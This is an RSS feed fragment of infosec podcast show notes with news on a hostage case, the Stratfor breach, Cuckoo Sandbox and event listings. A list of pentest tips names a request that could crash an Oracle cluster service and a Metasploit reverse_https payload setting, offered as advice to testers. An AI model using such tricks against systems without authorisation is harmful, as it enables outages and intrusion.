	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According to the </span><a href="http://www.google.com/hostednews/ap/article/ALeqM5h2c0EBQh7ry6lvOQe4V26jZtYLaA?docId=a60a26340e6140e3b1ef499c8f449b64"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Associated Press</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, the woman and her disabled son were held captive for about four or five days, during which they were abused both physically and sexually. Sergeant Jon Arnold of the Salt Lake City Police Department told the Associated Press that the woman hid in a closet with her laptop and posted a status update on Facebook saying she would be &quot;dead by morning&quot; if they were not rescued.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">One of her Facebook friends called the police after seeing her post, and the police went to the residence to investigate. When they arrived at the residence, they were met by 33-year-old Troy Reed Critchfield. Critchfield initially wouldn&#39;t let the police in, but they were finally allowed in and allowed to talk to the woman.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">She told them she and her son had been held hostage in the house for about five days, during which they had been hit, choked, and sexually abused.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Arnold said that while the woman had &quot;injuries consistent with the allegations,&quot; she refused to go to a hospital for treatment.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The police eventually arrested Critchfield on suspicion of aggravated kidnapping, forcible sodomy, aggravated assault, domestic violence, child abuse, animal cruelty, and other charges. Critchfield has a record &#8212; in 2010, he pleaded guilty to charges of felony aggravated assault and obstruction of justice.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.&nbsp;&nbsp;&nbsp; </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;</span><a href="http://www.cuckoobox.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.cuckoobox.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In three words, Cuckoo Sandbox is a malware analysis system. &nbsp;Its goal is to provide you a way to automatically analyze files and collect comprehensive results describing and outlining what such files do while executed inside an isolated environment.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It&#39;s mostly used to analyze Windows executables, DLL files, PDF documents, Office documents, PHP scripts, Python scripts, Internet URLs and almost anything else you can imagine.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">But it can do much more&#8230;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It&#39;s up to you to discover what and how.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Some of the results that Cuckoo generates are:</span></p>
<ul>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Trace of performed relevant win32 API calls</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Dump of network traffic generated during analysis</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Creation of screenshots taken during analysis</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Dump of files created, deleted and downloaded by the malware during analysis</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Trace of assembly instructions executed by malware process</span></li>
</ul>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In addition, Cuckoo allows you to:</span></p>
<ul>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Automate submission of analysis tasks</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Create analysis packages to define custom operations and procedures for performing an analysis</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Run multiple virtual machines concurrently</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Script the process and correlation of analysis results data</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Script and automate the generation of reports in the format you prefer</span></li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-554-pentesting-lessons-twitter-suite-hidden-dragon-stratfor-again-facebook-911-cuckoo-boris-top-5/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3309/0/infosec-daily-podcast-episode-554.mp3" length="26833124" type="audio/mpeg" />
		<itunes:duration>0:55:51</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 554 for December 28, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, and Geordy Rostad.
	&#160;
Announcements:
Brad Smith (theNurse)
	We all know and love Brad Smith, aka t[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 554 for December 28, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, and Geordy Rostad.
	&#160;
Announcements:
Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	CampusCon 2012
	When: January 21, 2012
	Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland
	http://campuscon.hackingwit.com
	(from Baconzombie)
	SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style
	When: Starts January 24, 2012
	Where: Atlanta, GA
	Discount Code:
	http://www.sans.org/mentor/details.php?nid=25484
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	CFP now open!
	DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	Pentest Lessons
	1. &#160;Sending a web server check (GET / HTTP/1.0) can crash the Oracle cluster service (or at least it used to) @sawaba
	2. &#160;You can specify a valid cert to be used with a reverse_https payload (requires cert+key in the same file): set SSLCert /path/to/cert.pem. &#160;@hdmoore
	3. &#160;Do not use a new tool or exploit on a customer&#39;s network without testing it in a controlled environment first. @pentestlessons
	4. &#160;Patch and/or update your software (sploits, metasploit, nessus, etc.) before you go on-site. &#160;There is nothing worse that being on-site and not being able to update anything. &#160;@b105h4ck3r
	5. Ensure you ask the customer whether they use sa accounts for their MSSQL servers, or if they have low threshold for lockouts before you even start scanning their networks. nmap -A and nessus default scans test the top 6 passwords, and if they have a lockout of 4, you probably just shut down all their database applications. @krangarajan 
	6. &#160;If possible, get familiar with the networking equipment in use before running scans, as some may not be able to handle the most mundane, typical port scans! @sawaba

In one case, I was scanning systems attached to an ancient HP switch, and overflowed the buffers. As a result, no one connected to the switch could access the Internet. All 6 feet, 7 inches of the CEO burst into the conference room and boomed, &#34;Who the fuck BROKE my INTERNET?&#34;.
I&#39;m not sure if Checkpoint firewalls are still set up this way, but even a few years ago, they used to have a persistent &#34;Connection Table&#34; the firewalls I encountered had this table set to 40,000 connections. It would statefully track all these connections until they closed or timed out. The timeout value, if the connection was not cleanly closed was set to 2 hours. The problem was that, once the connection table was filled, it wouldn&#39;t all[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 553 &#8211; Stratfor, MiamiPD,GoDaddy, Siemens, CDSN &amp; Rick’s Top 5</title>
		<link>http://www.isdpodcast.com/episode-553-stratfor-miamipdgodaddy-siemens-cdsn-ricks-top-5</link>
		<comments>http://www.isdpodcast.com/episode-553-stratfor-miamipdgodaddy-siemens-cdsn-ricks-top-5#comments</comments>
		<pubDate>Wed, 28 Dec 2011 01:50:23 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3304</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 553 for December 27, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Varun Sharma. &#160; Announcements: Brad Smith (theNurse) We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 553 for December 27, 2011. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Varun Sharma.</span></p>
<p>	&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CampusCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 21, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland</span><br />
	<a href="http://campuscon.hackingwit.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://campuscon.hackingwit.com</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">(from Baconzombie)</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts January 24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code:</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25484"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25484</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.computerworld.com/s/article/9223025/Confidential_client_list_safe_from_Anonymous_Stratfor_says"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.computerworld.com/s/article/9223025/Confidential_client_list_safe_from_Anonymous_Stratfor_says</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Activist hacker group Anonymous has claimed to have stolen thousands of emails, passwords and sensitive credit card details from a US-based security think-tank, forcing it to suspend operations. &nbsp;Promising it was just the start of a week-long Christmas inspired assault on a long list of targets.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Hackers Group said they were obtain the information because the stratfor did not encrypt it. The Austin-based company which provides international affairs and security threats, says the operation has been suspended on its server and email. Stratfor website was not working on Monday .</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The breach doesn&#39;t necessarily pose a risk to owners of the credit cards. A card user who suspects fraudulent activity on his or her card can contact the credit card company to dispute the charge.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Stratfor said in an email to members that it had suspended its servers and email after learning that its website had been hacked. Stratfor&#39;s sent an e-mail to subscribers yesterday, confirming the cyberattack .</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;We have reason to believe that the names of our corporate subscribers have been posted on other web sites,&quot; said the email, signed by Stratfor Chief Executive George Friedman and passed on to AP by subscribers. &quot;We are diligently investigating the extent to which subscriber information may have been obtained.&quot;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;Stratfor&#39;s relationship with its members and, in particular, the confidentiality of their subscriber information, are very important to Stratfor and me,&quot; Friedman wrote.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">One member of the hacking group, who uses the handle AnonymousAbu on Twitter, claimed that more than 90,000 credit cards from law enforcement, the intelligence community and journalists &ndash; &quot;corporate/exec accounts of people like Fox&quot; News &ndash; had been hacked and used to &quot;steal a million dollars&quot; and make donations.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It was impossible to verify where credit card details were used. Fox News was not on the excerpted list of Stratfor members posted online, but other media organisations including MSNBC and Al-Jazeera English appeared in the file.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Anonymous warned it has &quot;enough targets lined up to extend the fun fun fun of LulzXmas through the entire next week&quot;.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Anonymous has previously claimed responsibility for cyber attacks on financial institutions seen as enemies of the whistle-blowing website Wikileaks.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The damage from a weekend data breach at a think tank on international security issues appears to have been inflated by the assault&#39;s perpetrators, the hacker collective known as Anonymous.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">After Anonymous ransacked think tank Stratfor&#39;s computers and stole away thousands of credit card numbers and other personal information, it claimed to have also clipped the company&#39;s confidential client list. That list contains sensitive information about Stratfor&#39;s high- profile clients, such as Apple, the U.S. Air Force, and the Miami Police Department.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">However, Stratfor denies that Anonymous got the think tank&#39;s family jewels. &quot;Contrary to this assertion the disclosure was merely a list of some of the members that have purchased our publications and does not comprise a list of individuals or entities that have a relationship with Stratfor beyond their purchase of our subscription-based publications,&quot; the firm says in an e-mail to its members dated December 25.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Stratfor adds that it had hired an identity theft and monitoring service to assist its members affected by the data breach. Further details on those services will be released to affected members later this week, it says.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">On Monday morning, </span><a href="http://stratfor.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stratfor&#39;s website</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> was offline. Visitors to the location are being greeted to an &quot;undergoing maintenance&quot; screen. </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
